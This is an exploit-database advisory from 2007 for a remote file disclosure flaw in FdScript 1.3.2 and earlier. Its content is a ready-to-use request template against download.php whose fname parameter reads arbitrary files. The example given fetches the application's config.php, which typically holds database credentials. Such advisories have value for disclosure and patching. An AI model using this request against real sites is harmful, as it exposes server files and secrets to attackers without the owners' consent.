id: 1429
date: 01/26/2007
title: FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability
author: ajann
cves: 

=====================================================================
FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability
=====================================================================



*******************************************************************************
# Title   :  FdScript <= v1.3.2 Remote File Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Free

*******************************************************************************

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-22]  #